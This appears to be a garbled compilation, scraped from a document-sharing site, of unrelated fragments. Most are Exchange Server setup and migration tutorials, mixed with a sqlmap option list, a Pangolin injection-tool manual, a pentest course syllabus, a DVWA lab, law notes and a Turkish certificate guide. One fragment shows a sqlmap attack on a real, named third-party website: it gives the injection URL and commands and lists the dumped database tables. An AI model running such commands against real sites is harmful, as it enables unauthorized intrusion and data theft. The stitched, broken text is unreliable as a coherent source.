通过前几篇文章的介绍,我想大家对于Exchange的服务器的一些基本的管理有了一定的认识了,不过接到好几位朋友的来信,说我把默认的管理组,路由组全部重命名成了“First”、“Second”之类的,弄得他们有点糊里糊涂,所以从这篇文章开始,我把Exchange服务器的设置全部又改成默认状态,并且为了方便记忆,我把域外域控制器的名字由“test20031”改成了“BDC”,这一点请大家注意一下!很多朋友在看完的前几篇文章后,不由的提出了一个问题:“邮箱怎么开?”,因为在“Exchange系统管理器”里好像根本找不到在哪开邮箱,是的,Exchange的邮箱开设和别的邮件服务器有一些区别,Exchange的邮箱开设需要另外一个工具,那就是“Active Directory用户和计算机”,很熟悉吧?打开这个管理工具的方法有很多,因为我这里是在讲Exchange,所以我们用Exchange的方法来打开这个工具,转到EX1上,然后点击“开始—程序—Microsoft Exchange—Active Directory用户和计算机”:
我们可以看到在里面有一个名为“Tom”的用户,现在就为这个叫“Tom”的用户开设一个邮箱,左键选中“Tom”,然后击“右键”:
从上图中,可以看到,相比于没有安装Exchange时,多出了一个“Exchange任务”,这个标签就是用来开设邮箱的,我们来点击一下:
在“不再显示此欢迎页面”前打个勾,省得它每次都出现,挺烦人的,然后点“下一步”:
上图中会出现三个任务,我们用得最多的是第一个任务“创建邮箱”,第二个任务“建立电子邮件地址”,这个任务用到的几率不是很高,但有些特殊的情况也会用到,至于第三个任务“删除Exchange属性”基本上不会用到,所以这里我只讲前两个任务,现在我们先选中第一个任务“创建邮箱”,然后点“下一步”:
以上这张图是创建邮箱这个任务中非常关键的操作,我来一一详细的说明一下:
1、“别名”项,这里的意思用户邮箱的用户名,比如上图中的“Tom”那么这个邮箱的地址就是:tom@https://www.doczj.com/doc/7213575377.html,,(其中https://www.doczj.com/doc/7213575377.html,是域名),需要注意的是,这里的“别名”可以和你的用户的登陆名不一样,如上图中的“Tom”,你可改为“Jack”或其它的任意符合规定的名字,默认情况下是和登陆名一样的,我个人的建议是最好也不要更改,以方便记忆!
2、“服务器”项,这个选项是给你选择你所开设的邮箱是存储在哪个服务器上的,你的网络上有多少个Exchange服务器都会在这里出现,你可以通过点击下拉菜单进行选择,这里本人建议选择的时候有一定的规律性,比如生产部的员工的邮箱是保存在EX1上的,销售部的邮箱是保存在EX2上的,这样比较方便你到客户端去设定。
3、“邮箱存储”项,如果你的Exchange服务器上有多个邮箱存储的时候,你可选择当前开设的邮箱放到哪个邮箱存储中去,也是通过下拉菜单选择。
解释完这些功能后,大家再去看我上面那幅图就非常明显了,我们的设定是:tom的邮箱地址是:tom@https://www.doczj.com/doc/7213575377.html,,邮箱保存在服务器EX1的第一个存储组的邮箱存储里面,设好这些后点“下一步”:
上图我们可以看到结果,顺便把“关闭向导时查看详细报告”前打个勾,然后点“完成”:
上图是一个XML格式的日志文件,纪录了我们刚刚的操作,在一些排错方面很有用,当然整个过程没有什么问题的话,那当然也就是纪录一下而已了。
通过上面的操作,整个邮箱的建立就完成了。接下来,我们来看一下刚刚的第二个任务“建立电子邮件地址”,这个任务有什么用呢?我们可以假设这样一种场景,公司来了一位新同事,他本身就有一个外部邮箱,比方说是zs@https://www.doczj.com/doc/7213575377.html,,这个邮箱上有很多的业务,如果新开设邮箱的话,那么新邮箱的域名就要发生变化,这就需要通知所有的客户,比较麻烦,那么怎么把这个外部邮箱和内部用户关联起来呢?用到的就是这个“建立电子邮件地址”的任务,需要说明一下的是这个任务和刚刚那个“创建邮箱”不能在同一个用户上用,所以要在另一个用户上进行这个任务:
我们来选中上图中的“张三”这个用户,同样是击“右键”,选择“Exchange任务”:
这里我们要选择“建立电子邮件地址”,然后选“下一步”:
点击上面的“修改”:
选中“SMTP地址”,点击“确定”:
在“电子邮件地址”输入:zs@https://www.doczj.com/doc/7213575377.html,,然后再点一下“高级”:
这里可以设定一些邮件的设置,大家可以根据实际情况而定,设置完成后点“确定”:
设置完成后就会如上图所示,然后点“下一步”:
点“完成”就OK了。
接下来,我们来看一下创建邮箱后,用户的属性发生了哪些变化,在“Tom”用户上双击。
请大家注意我用红框标出的位置,这些属性在用户Exchange邮箱没有创建以前是没有,创建邮箱以后这些属性才得已添加,现在我就来结合一些实际情况中的场景,来详细给大家介绍一下这些属性中常用部分的作用和功能,
1、我们先来选择“Exchange 常规”:
在“Exchange常规”属性里有三个重要的内容,分别是“传递限制”、“传递选项”、“存储限制”,选来点击一下“传递限制”:
在这里我们可以:
①、分别限定发送邮件和接收邮件的大小,如果超过限制,Exchange将会对这些邮件拒绝操作,这样可以有效的操作网络流量,以防止一些用户利用邮件来发送一些大型的程序从而可能引起网络堵塞的现象。如果你在Exchange服务器上设置为无限制的话,那么这里的默认也是无限制的。
②、尤其需要提醒大家的时我用红框标出的位置,如果你在“仅来自通过身份验证的用户”前打上勾的话,那么,该用户将无法接到任匿名用户来邮件,也可以理解为无法接收来自Intelnet邮件,因为外网用户是无法通过身份验证的。
③、如果你希望该用户仅仅只能和某几位其它用户进行通讯的话,那么请在选中“仅来自”或“来龙去脉自任何人,除(V)”这个选项,然后点击“添加”以便添加相应的用户。
我们再来点击一下“传递选项”:
我从上到下来介绍一下:
①、代表发送:这里主要是用于权限的委派,大家不妨可以设想这样一种场景,一般的大型企业里,CEO是不大可能自己去发一些会议通知的,一般都是由秘书代为发送的,但又希望是以CEO的名义来进行发送,那么如何实现?用的就是这个功能。你可以点击“添加”来添加相应的授权用户。
②、转发地址:转发地址是用来把该用户的邮件转发到别的邮箱,可以选中“转发到”,然后点“修改”进行相应用户的添加,那么这种方法呢可以有效的隐藏自己的邮箱,而且当你在“将邮件同时传递到转发地址和原始收件人的邮箱”前打上勾的话,那么这个邮件将会有一个副本发送到指定的信箱,可以起到对用户邮箱进行监控的作用,需要注意的是,邮件的正本和副本是独立存在的,对正本或副本的任何操作,包括删除,不影响另一个的存在状态。
③、收件人限制:这个从字面意思理解一下就可以了,也就是指定一下收件人的最多人数而已。
再来看一下“Exchange常规”的最后一个选项“存储限制”:
这里可以设定两个内容:
①、存储限制:这个应该很容易理解,无非就是邮箱大小达到多少发出警告,达到多少禁止发送,达到多少发送接收全禁止,大家可以根据自己的实际情况进行指定。
②、已删除项目的保留时间:这个选项对已删除邮件恢复有一定的作用,要提醒大家的是,当你在“完成对存储的备份之后才永久删除项目”前打上勾的话,而你的备份时间间隔又比较长,并且你的Exchange服务器邮件来往很多的情况下,那么对Exchange服务器的存储容量有一定的要求,大家可以根据实际情况指定。
2、再来看一下“电子邮件地址”:
这里其实还是比较简单的,在这个属性项里可以“新建”、“编辑”、“删除”电子邮件地址,我们可以看到默认情况下只有一个SMTP和X400类型的地址,大家可能根据需要来进行操作,另外请大家注意红框部份,“基于收件人策略自动更新电子邮件地址”这个选项默认是被选中的,请大家尽量不要取消这个勾,因为一旦取消,在服务器上设置的收件人策略对这个用户将不起作用。
3、Exchange功能:
这个好像比刚刚那个还要“电子邮件地址”还要容易,这里就是为单个用户指定相应的移动服务和协议,默认情况下是全部启用的,但可以根据实际情况进行限定,比如不希望该用户使用POP3协议,那么就可以选中“POP3”,然后点“禁用”就可以了,其它的功能也是一样的设置。
4、Exchange高级:
这里有必要稍微详细解读一下:
①、“简单显示名”:这个选项在默认情况下是空的,那什么在什么情况下这个地方才有用呢?当你的网络上存在多台不同语言版本的Exchange服务器,而且你希望用这些服务器来管理整个组织的时候才有用,比如你用中文版式的Exchange系统管理器来管理日文版的Exchange服务器时,由于无法显示所有字符,所以你在这里为相应的用户指定一个简单用户名,以方便显示。
如果你不希望该用户出现在Exchange地址列表中,那么你可以选中“不显示在Exchange地址列表中”
如果要防止用户向X.400发送高优先级的邮件,那么请选中“降级发往X.400的高优先级邮件”
②、“自定义属性”:在默认情况下,用户的电话号码、职务等属性本身就包含其中。但一些比如家庭、人员等其它属性并不包含,所以我们就需要通过这个选项来创建这些属性,总共可创建15项。
③、“邮箱权利”:点一下“邮箱权利”可以看到如下画面:
默认情况下只有一个“SELF”组,其它权限的指定方法和我们在Windows里的安全权限指定类似,权限的具体功能可以从字面意思理解,大家还可以点击“添加”按钮来进行用户的添加。
接下来我们去看一下客户端的设定,首先需要在客户端上安装Microsoft Outlook 2003,这也是Office 2003中的一个组件,然后我们用TOM这个用户来登录:
登录后,我们开始运行Outlook 2003:
点“下一步”:
选“是”,点“下一步”:
选第一项“Microsoft Exchange Server”,然后点“下一步”:
在“Microsoft Exchange Server”里输入:EX1,因为TOM这个用户的邮箱是存储在EX1上的,用户名里输入“tom”,然后点一下“检查姓名”:
如果出现如下图所示,就表示全部正确,如果报错的话,要么就是你的输入有误,要么就是你的服务器上的设置有问题,请相应解决。再点“下一步”:
点“完成”:
部署第一台2013服务器 2013-06-30 11:10:42 引子: ExchangeServer 2013目前是微软公司邮件系统产品的最新版本,它的诸多诱人特性众所周知。在过去一年的时间里有不少朋友咨询其企业中选择什么样的邮件系统比较好?关键在于易上手,容易管理和使用,稳定性强,安全性高。由此,当然是给他们推荐基于云的Exchange Online。但是,许多朋友提到由于公司的安全策略,以及各种老板的“英明决断”,所以不愿采用基于公有云的服务。不过对于在企业中实现私有云比较感性趣,而且愿意进行更多的尝试。由此,我只能向其推荐使用基于企业部署的Exchange Server 2012企业版了。 接踵而来的问题就是对于某些公司虽然购买了一套强大的邮件服务系统产品(虽然,微软已经将其定位到了统一协作平台的位置,但做中国市场中,绝大多数用户还是会将Exchange从意识中定位在邮件系统这个层面上。),但不舍得再投入资金购买相关的产品服务了。这就劳累我这帮做IT的兄弟啦!当然,最终只能我搞义务劳动了。多做了几次,也是会累,会不爽的。所以,想了一下,就直接写出来吧,让他们来自己查阅,自己搞定。如果不行,我再江湖救急了。 延续此前为微软易宝典投稿的文章风格,继续以易宝典的形式来写这一系列的文章。 一、系统需求 既然推荐给朋友的东西当然应该是最好的东西了,向朋友推荐Exchange Server 2013的时候,我建议他们采用WindowsServer 2012作为服务器的操作系统。虽然微软刚刚发布的Windows Server 2012 R2的预览版,但是就微软发布产品的速度来讲,当前采用Windows Server 2012也是明知之选。因为如果采用WindowsServer 2008 R2可能在短期内会面临系统升级,采用Windows Server 2012如果幸运的话,微软在发布Windows Server 2012 R2时,没准会赶上活动或促销,获得低价或免费升级到Windows Server 2012 R2。当然,目前肯定是不能使用WindowsServer 2012 R2的,因为预览版即使微软授权给你用在生产环境中,你敢用吗?
详解强大的SQL注入工具——SQLMAP Akast [N.S.T] 1. 前言 Windows下的注入工具好的又贵,免费的啊D、明小子等又不好用,我们根本没必要花 时间去找什么破解的havij、pangolin什么的,特别是破解的工具很可能被绑了木马。其实Linux下的注入工具也是非常强大的,不过分的说,可以完全取代Windows下面的所有注入工具。 就如backtrack系统里面就有非常丰富的注入工具,对MSSQL、MYSQL、oracle等各种 数据库的应有尽有了,而且这些工具都是免费的,并且是开放源代码的,我们还可以用来修改为合适自己使用的注入工具。 本文给大家介绍的SqlMap是一个开放源码的渗透测试工具,它可以自动探测和利用SQL 注入漏洞来接管数据库服务器。它配备了一个强大的探测引擎,为最终渗透测试人员提供很多猥琐的功能,可以拖库,可以访问底层的文件系统,还可以通过带外连接执行操作系统上的命令。 2. SQLMAP命令详解 为了方便使用我把sqlmap的选项都翻译出来了,当然可能会存在一些不恰当的地方, 请大家指出,可以给我发邮件:akast@https://www.doczj.com/doc/7213575377.html,。如果我有时间会把这个工具出个中文版。 Options(选项): --version 显示程序的版本号并退出 -h, --help 显示此帮助消息并退出 -v VERBOSE 详细级别:0-6(默认为1) Target(目标): 以下至少需要设置其中一个选项,设置目标URL。 -d DIRECT 直接连接到数据库。 -u URL, --url=URL 目标URL。 -l LIST 从Burp或WebScarab代理的日志中解析目标。 -r REQUESTFILE 从一个文件中载入HTTP请求。 -g GOOGLEDORK 处理Google dork的结果作为目标URL。 -c CONFIGFILE 从INI配置文件中加载选项。 Request(请求):: 这些选项可以用来指定如何连接到目标URL。 --data=DATA 通过POST发送的数据字符串 --cookie=COOKIE HTTP Cookie头 --cookie-urlencode URL 编码生成的cookie注入 --drop-set-cookie 忽略响应的Set - Cookie头信息
Windows 2008 Uzerinde Exchange 2007 Owa Ve Rpc Over Http Icin Sertifika Kullanimi Bu yaz?mda sizlere Windows 2008 server üstüne certification services kurarak Exchange 2007 yap?m?za sertifika alarak OWA sitesine SSL ile sertifika uyar?s? almadan girmeyi ve günümüzde kullan?m? popüler olan RPC over http i?in neler yapmam?z gerekti?ini anlatmaya ?al??aca??m. ?lk ?nce Server Manager’dan “Add Role” diyerek “Active Directory Certification Services” rolünü se?iyoruz.
Bu ekranda “ Certification Authority Web Enrollment” se?ene?ini de se?iyoruz ki Web sayfas?ndan CA m?za eri?ip sertifika alabilelim.
CA y? Domain ortam?nda kurudu?umuz i?in “Enterprise” se?ene?i ile devam ediyoruz. Bu sayede Domain’e üye olan kullan?c?lar i?in client taraf?nda sertifika ?ekmeden CA m?z i?in güveni sa?lam?? oluyoruz. Ortamda tek bir CA oldu?u ve oda bu kurdu?umuz sunucu oldu?u i?in bu ekranda ROOT CA se?ene?i ile devam ediyoruz.
培训方案 1、对学生知识的要求 对Windows、Linux及SQL语句有一定的了解即可 2、学生的知识能力提高 本课程重点培训学生的Web渗透测试能力,通过20天的渗透测试培训,学生可具备以下能力 1)、了解 Web服务器的工作过程及原理 2)、了解 HTTP协议 3)、学会渗透测试前踩点技能 4)、学会使用常见的渗透测试工具如burpsuite、SQLmap等等 5)、了解常见的系统攻击过程及手段 6)、学会常见的系统攻击方法 7)、学会 Web服务器的信息获取 8)、学会 IIS、Apache、tomcat、Weblogic等常见中间件的漏洞利用方式及加固方法 9)、深入了解各类SQL注入漏洞的原理、攻击手段及加固措施 10)、掌握上传漏洞、命令执行漏洞、XSS漏洞等常见Web漏洞的利用方式及技巧 11)、掌握各类提权方法 12)、掌握各类第三方插件/程度的漏洞利用方法 3、考试及颁发证书 暂无,可有 4、培训案例分析 安云科技针对学生每年举办两次定期培训,现已经举办了 4次针对学生的培训,同时,受邀给青岛工学院、济南职业技术学院、山东警察学院等学校的老师进行培训
关于提升就业问题:现阶段,国家对信息安全的重视及网络安全行业的火爆,但人才短缺, 安全行业的薪资也普遍高于其它行业,据调查,目前山东省内所有安全公司都面临人员不足的情况 5、培训课程 时间授课内 安排分类容章节实验 Web安全第一节:服务器是如何被入 简介侵的 第二节:如何更好的学习web 安全 1.发起http 请求 第一第一节:http协议解析 2.http 协议详解 3.模拟http 请求 天 4.http 和https 协议区别 Web安全 1.burpsuit 初体验 简介 第二节:截取HTTP请求2.fiddl er介绍 3.winsockexpert 实验 第三节:HTTP应用:黑帽SEO 之搜索引擎劫持 第一节:googlehack 1.搜集子域名 2.搜集web信息第二基础 信息刺 1.安装nmap 天篇第二节:nmap详细讲解 2.探测主机信息探 3.namp脚本引擎 第三节:dirbuster介绍 第四节:指纹识别 1.targe t 2.spide r 第一节:burpsuit 3.scanner 4.Intruder 5.辅助模块 第三漏洞扫 1.wvs向导扫描天描第二节:wvs介绍 2.web扫描服务 3.wvs小工具
Exchange Server 2010 的安装 每一个技术课程都是由浅至深的过程,我选择了最简单的安装做为Exchange Server 2010系列的开篇,如果你安装过2003或是2007下面的过程应该不会陌生,因此这一篇的重点还是在如何做好组织及服务器的前提准备上。 在把视野放到安装服务器前,我们首先需要对环境中的组织结构进行评估。这个步骤里我们需要考虑: 1.现有域的功能级别。Exchange Server 2010需要2003域功能级别,在提升功能级别前你需要考虑现有环境中的2000的域控制器,以及现有应用程序的兼容性。 2.保证每个Exchange AD站点包含Windows Server 2003 SP2 全局目录 3.对环境现有状态进行评估,可以借助Addiag和EXRAP完成 4.如果从旧有邮件服务器进行迁移需要为组织中的所有EX2003&07服务安装SP2补丁 完成了上面的步骤,我们就可以在服务器上进行安装了(在实际部署中我们需要考虑的不止这些,比如带宽、比如站点拓扑、比如角色分离等等)。。 服务器安装前提条件 在安装Exchange Server 2010之前我们需要在服务器上做一些必要的准备,这里包括添加角色,功能,开启必要的服务以及安装支持的应用程序,进行这些前提条件的准备是我们下一步安装Exchange Server 2010的基础,相关操作请参考截图: 1.安装IIS角色 2.添加.NET Framework 3.5.1(WCF激活必须选中)以及Windows PowerShell 集成脚本环境(ISE) 注:由于服务器上我使用了Windows Server 2008 R2操作系统,因此系统功能中集成了.NET Framework 3.5.1以及Windows PowerShell V2.0 如果你使用的是Windows Server 2008操作系统会发现系统中集成的是.NET Framework 3.0以及Windows PowerShell V1.0 。因此你需要单独下载并安装这2个组件。
第一章、简介 1.1 Pangolin是什么? Pangolin是一款帮助渗透测试人员进行Sql注入测试的安全工具。所谓的SQL注入测试就是通过利用目标网站的某个页面缺少对用户传递参数控制或者控制的不够好的情况下出现的漏洞,从而达到获取、修改、删除数据,甚至控制数据库服务器、Web服务器的目的的测试方法。Pangolin能够通过一系列非常简单的操作,达到最大化的攻击测试效果。它从检测注入开始到最后控制目标系统都给出了测试步骤。 过去有许多Sql注入工具,不过有些功能不完全,支持的数据库不够多,或者是速度比较慢。但是,在Pangolin发布以后,这些问题都得到了解决。Pangolin也许是目前已有的注入工具中最好的之一。 1.2 使用Pangolin可以用来 如下是一些示例: ?渗透测试人员用于发现目标存在的漏洞并评估漏洞可能产生后果的严重程度?网站管理员可以用于对自己开发的代码进行安全检测从而进行修补 ?安全技术研究人员能够通过Pangolin来更多更深入的理解SQL注入的技术细节 1.3 特色 如下是Pangolin提供的一部分特点: ?全面的数据库支持 ?独创的自动关键字分析能够减少人为操作且更判断结果准确 ?独创的内容大小判断方法能够减少网络数据流量 ?最大话的Union操作能够极大的提高SQL注入操作速度 ?预登陆功能,在需要验证的情况下照样注入 ?代理支持 ?支持HTTPS ?自定义HTTP标题头功能 ?丰富的绕过防火墙过滤功能 ?注入站(点)管理功能 ?数据导出功能
……等其他更多 1.4 它不能做什么 Pangolin只是一个注入验证利用工具,不是一个Web漏洞扫描软件。因此您不能用它来做整网站的扫描。另外,他也不支持注入目录遍历等功能,这些功能您可以借助其他的安全工具进行。 1.5 到哪里获取Pangolin Pangolin的更新速度很快,你可以经常到https://www.doczj.com/doc/7213575377.html,/web/pangolin去下载最新版本。 1.6 运行环境 目前Pangolin只能运行在Windows系统平台,支持32位/64位Windows NT/2000/XP/2003/Vista/2008。 1.7 报告问题和获取帮助 如果您在使用过程中有任何的意见或者建议,您可以到https://www.doczj.com/doc/7213575377.html,网站上进行评论留言,这里会有一群共同兴趣的朋友帮助您。或者您可以直接给我发送邮件:zwell@https://www.doczj.com/doc/7213575377.html,。 第二章、用户界面 下图为主界面图
实验简介 DVWA (Dam Vulnerable Web Application)DVW A是用PHP+Mysql编写的一套用于常规WEB漏洞教学和检测的WEB脆弱性测试程序。包含了SQL注入、XSS、盲注等常见的一些安全漏洞。sqlmap是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL的SQL注入漏洞。支持很多数据库。所以一个矛一个盾,正好感受一下sql注入。DVW A 的安装就不详细介绍了,需要PHP/apache/mysql sqlmap是开源的,可以在github上找到。 cookie注入其原理也和平时的注入一样,只不过说我们是将提交的参数已cookie方式提交了,而一般的注入我们是使用get或者post方式提交,get方式提交就是直接在网址后面加上需要注入的语句,post则是通过表单方式,get和post的不同之处就在于一个我们可以通过IE地址栏处看到我们提交的参数,而另外一个却不能。 实验预备知识 1.web抓包工具的使用; 2.sqlmap的使用 3.了解cookie注入原理 实验操作 一、查找注入点 1.打开Burp Suite,设置浏览器代理上网 图1:Burp Suite设置
图2:浏览器设置 图3:Burp Suite获取web数据包界面。intercept off(关闭)、在点击改建intercept on(开启)
2.将Burp Suite设置成intercept off,登录DVW A,将DVW A安全性设置成low;然后将Burp Suite设置成intercept on,在DVW A的SQL Injection页面上有一个userid输入框,随便输入然后点击submit,在Burp Suite中可以找到GET信息,其中有Request URI和Cookie信息。
1、Exchange Server 介绍 ◆Exchange Server 2010是电子邮件及消息通信和协作软件服务器,是微软整合通讯方 案的基础。 ◆Exchange Server 2010分为: 标准版与企业版 ◆Exchange邮件接收方式也不仅仅局限于使用Outlook,你也可以使用Foxmail等其他 软件,也可以通过Web方式使用OWA方式接收 2、邮件服务器基础知识 ◆邮件服务器是企业内部信息交换的工具,它比其他微软的软件集成度都高。 ◆邮件服务器前端-------也称邮件网关,是用来防御垃圾邮件和邮件病毒(Exchange边 缘服务器,Symentec软件或其他硬件网关) ◆邮件服务器后端-------邮件存档 将历史的邮件(前一年或两年的邮件)转存在廉价存储,降低管理成本。一般用SATA低速存储或磁带盘。 3、Exchange 2010能实现的功能 Exchange 2010能实现的功能 高集成性、高效协作如果AD域搭建好,SSO构建好,则可直接设置权限. Exchange 搭建后,与Sharepoint配合使用,可以共享日程,可看到外部业务伙伴的闲忙程度,提高协作性 DAG 高可用,数据库可用性组Exchange2010最多可创建16个邮箱数据库副本,这些副本之间可以相互切换,实现故障时的工作不间断性。这个功能还能减少RAID数量(廉价冗余磁盘 阵列,原一般为5个存储数据的磁盘) 存档服务器,邮件归档企业可采用容量更大、速度更低的磁盘保存企业前几年的邮件,等有需要的时候,可以到历史的低速磁盘中查找历史的邮件。 按条目设定颗粒的保留策略,并依法保留捕获所有修改和删除的邮件。允许核查人员方便执行多个邮箱搜索。 增强的语音邮件增强的语音邮件,如果与Lync配合使用,可将Lync的语音聊天文件发到邮件里;可定制的呼叫接听规则和接收传真功能 管理邮件过载 发件人邮件小贴士,减少不必要的邮件。
1.需求说明 实现用户通过数据库验证登录需求,采用Myeclipse+Tomcat 6.0+Mysql 5.0+JDK 1.6 2.数据库表 开发所用是Mysql数据库,只建立单张用户表T_USER,表结构如下: sql语句如下: CREATE TABLE `t_user` ( `ID` int(11) NOT NULL auto_increment, `USERNAME` varchar(255) default NULL, `PASSWORD` varchar(255) default NULL, PRIMARY KEY (`ID`) ); 3.构建源代码目录
4.用到的jar包(见附件Archive.rar)
5.各项Xml配置文件详解 (1)web.xml文件(Tomcat使用) 服务器根据配置内容初始化spring框架,springmvc框架和log4j日志框架
1.目标网站: http://vietnhatpro.vn/ 2.注入点: 这里可以自己找 http://vietnhatpro.vn/index.php/mod,product/task,view/id,20/ 可以看到 他的url有点不一样,我们常识把他变成动态的 访问 http://vietnhatpro.vn/index.php/mod,product/task,view/?id=200 发现可以,和上面的地址等效,开始注入 3. 检测注入 sqlmap -u http://vietnhatpro.vn/index.php/mod,product/task,view/?id=200 –tables 发现可以注入,而且是mysql 但是发现开始接收 information 的那个没用的数据库,太浪费时间所以先关掉
4.列出数据库 sqlmap -u http://vietnhatpro.vn/index.php/mod,product/task,view/?id=200 –dbs 发现最后一行出现了有用的数据库 vietnhat_db 5. 指定数据库,开始找表 sqlmap -u http://vietnhatpro.vn/index.php/mod,product/task,view/?id=200 -D vietnhat_db –tables
开始接收表啦,马上就要成功了 Database: vietnhat_db [43 tables] +-------------------------+ | user | | admin_menu | | lang | | tbl_action | | tbl_advert | | tbl_attribute | | tbl_contact | | tbl_download | | tbl_group_attribute | | tbl_member | | tbl_module_roll | | tbl_news | | tbl_nguoiban | | tbl_partner | | tbl_photo | | tbl_product_attribute | | tbl_product_attribute2 | | tbl_productor | | tbl_project |
一、Exchange Server 2013 支持操作系统
Windows Server 2012
Windows Server 2008 Standard or Enterprise (32-bit or 64-bit)
Windows Server 2008 R2 Standard or Enterprise
Exchange Server 2013 支持在 Server 2008 和 Server 2012 上安装,本次部署是在 Windows 2008 R2 Enterprise SP1 环境下部署。
二、补丁和组件安装:
1. Microsoft .NET Framework 4.5 RC 2. Windows Management Framework 3.0 3. Microsoft Unified Communications Managed API 4.0, Core Runtime 64-bit 4. Microsoft Office 2010 Filter Pack 64 bit 5. Microsoft Office 2010 Filter Pack SP1 64 bit 6. Microsoft Knowledge Base article KB974405 (Windows Identity Foundation) 7. Knowledge Base article KB2619234 (Enable the Association Cookie/GUID that is used by RPC over HTTP to also be used at the RPC layer in Windows 7 and in Windows Server 2008 R2) 8. Knowledge Base article KB2533623 (Insecure library loading could allow remote code execution)
EXCHANGE2010迁移方案
目录 1.环境对比 (3) 2.迁移思路 (3) 3.迁移时间安排 (3) 4.基础环境准备 (4) 4.1安装IIS (4) 4.2安装net3.5 (7) 4.3安装Microsoft filter Pack (8) 4安装exchange 2010 (9) 5.配置第二台服务器 (15) 5.1发送连接器源服务器修改 (15) 5.2服务器配置-集线传输设置 (16) 5.3 DNS配置 (17) 5.4证书申请: (18) 5.5OWA 不加域名登录设置 (24) 5.6附件大小设置: (25) 5.7设置脱过通迅录 (25) 5.8POP3 imap4配置 (27) 5.9修改NAT地址映射 (28) 6SERVEREX1环境测试 (28) 7.迁移 (29) 7.1SERVEREX1新建数据库 (29) 7.2批量移动用户 (29) 7.3查看移动请求状态 (30) 8.卸载旧2010服务器 (31) 8.1 卸载邮箱 (31) 8.2 卸载Exchange2010 其余功能 (32) 9.回退方案 (32) 9.1修改NAT地址映射 (32) 9.2修改发送连接器-源服务器为SERVEREX (33)
1.环境对比 2.迁移思路 在现有环境中搭建一台新Exchange2010,实现两台机器并存。在并存期间,新Exchange2010作为邮件系统的中枢,进出站邮件都要经过新Exchange2010。进站的邮件先经过新Exchange2010服务器,由新Exchange2010服务器判断是把邮件转到旧Exchange2010还是直接把邮件传送到用户邮箱;出站的邮件即使先提交到旧Exchange2010,最后也是要经过新Exchange2010才能发往外网邮局。 在并存期间,如果需要创建用户邮箱,直接在新Exchange2010上创建。 3.迁移时间安排 exchange现有用户约2600,数据文件788G;本次迁移计划分三天按数据库用户批量迁移。D1 wuxi 迁移 D2 nixing迁移 D3 longi-xian迁移
第十章国际投资法概述 10.1 复习笔记 一、国际投资概述 1.国际投资的概念 国际投资主要是相对于国内投资而言的。对于国际投资的概念的理解,有广义说和狭义说。通常认为,广义的国际投资包括国际直接投资和国际间接投资,狭义的国际投资仅指国际直接投资。 2.国际投资的特征 国际投资具有以下特点: ①投资目的多元化; ②使用货币多元化; ③体现一定的民族和国家利益; ④投资环境的差异性; ⑤存在较大风险。 3.国际投资的种类 (1)国际直接投资,又称股本投资,指一国私人(包括自然人和法人)在外国投资经营企业,直接或间接地控制其投资企业的经营活动,实际上是通过生产资本的输出把资本输出到国外,其最重要的特点在于投资者直接参与企业的生产经营管理。 (2)国际间接投资,又称财务性投资,是指通过借贷资本的输出把资本输出到国外,
其特点则在于投资者并不直接参与企业的生产经营管理。国际直接投资与国际间接投资的区别在于投资者能否有效地控制作为投资对象的外国企业。 4.国际投资的主要方式 (1)国际信贷。指一国政府、银行或国际金融组织或个人向其他国家政府、企业、其他经济组织和个人提供贷款、支付保证和出借有价证券。 (2)发行国际债券。指一国政府机构、企业、其他经济组织或个人向其他国家政府机构、企业、其他经济组织或个人发行的国际债券。 (3)在国外设立外资企业。指外国投资者依照东道国有关法律,经东道国批准,在其境内举办的全部为外国资本的公司或企业,由其独立经营,自负盈亏。 (4)在国外设立合资经营企业。即外国投资者与东道国投资者依照东道国有关法律,经过东道国批准,共同出资创立,共同经营,共担风险,共负盈亏的企业。其特点是属于股权式合营企业。 (5)在国外设立合作经营企业。与合资经营企业的区别在于其属于契约式合营企业。 (6)国际技术转让。即一国企业、其他经济组织或个人通过一定方式将其所拥有的技术转让或许可给他国的企业、其他经济组织和个人。其特点是将技术转让与资本投资活动结合在一起。 (7)合作开发自然资源。外国投资者单独或联合投资参与东道国资源开发项目,双方按照协定分担投资、风险,分享利益。 (8)其他投资方式。包括信贷贸易、补偿贸易、来料加工、来件装配、国际租赁、信托投资等。 二、国际投资法概述 1.国际投资法的概念和特征
exchangeserver2013运维系列 如果公司的邮箱服务器挂了,我们又没有做高可用,这个时候我们需要尽快地恢复邮箱数据库,并且保证邮箱正常收发邮件。现在我们需要用到邮箱数据库的备份了,一般情况下,我们会把数据库备份在共享存储中,或者至少是备份在另一台服务器上。我们采用的方法是将存储里面的数据库文件复制出来,在新的服务器上部署Exchange并创建新的数据库,然后将源数据库文件覆盖到新数据库文件中,最后把源数据库中的所有用户移植至新的数据库。下面进入具体步骤:一、查看源服务器的情况:1、源服务器名称,如下图:2、源服务器的数据库如下,我们用“DataBase01”数据库来做实验,如下图:3、在“DataBase01”中,有两个用户:“张三”、“李四”,如下图:使用命令查看:使用ECP管理界面查看:4、下面查看源数据库中的“张三”和“李四”的邮箱情况,如下图:“张三”的邮箱:“李四”的邮箱:5、我们需要把源服务器的数据库文件考出来,如下图:二、安装新的Exchange服务器:1、当源服务器崩溃后,我们需要在同一域的网络环境下安装一台新的Exchange服务器,在进行安装步骤前需要注意:重命名新服务器,名称不能与源服务器名称相同,否则无法安装;并且需要加入域,如下图:2、在新服务器上安装角色,打开PowerShell,分别执行以下命
令: Install-windowsfeature RSAT-ADDSInstall-WindowsFeature AS-HTTP-Activation, Desktop-Experience, NET-Framework-45-Features, RPC-over-HTTP-proxy, RSAT-Clustering, Web-Mgmt-Console, WAS-Process-Model, Web-Asp-Net45, Web-Basic-Auth, Web-Client-Auth, Web-Digest-Auth, Web-Dir-Browsing, Web-Dyn-Compression, Web-Http-Errors, Web-Http-Logging, Web-Http-Redirect, Web-Http-Tracing, Web-ISAPI-Ext, Web-ISAPI-Filter, Web-Lgcy-Mgmt-Console, Web-Metabase, Web-Mgmt-Console, Web-Mgmt-Service, Web-Net-Ext45, Web-Request-Monitor, Web-Server, Web-Stat-Compression, Web-Static-Content, Web-Windows-Auth, Web-WMI, Windows-Identity-Foundation –Restart 3、按顺序安装以下三个组件: UcmaRuntimeSetup FilterPack64bit
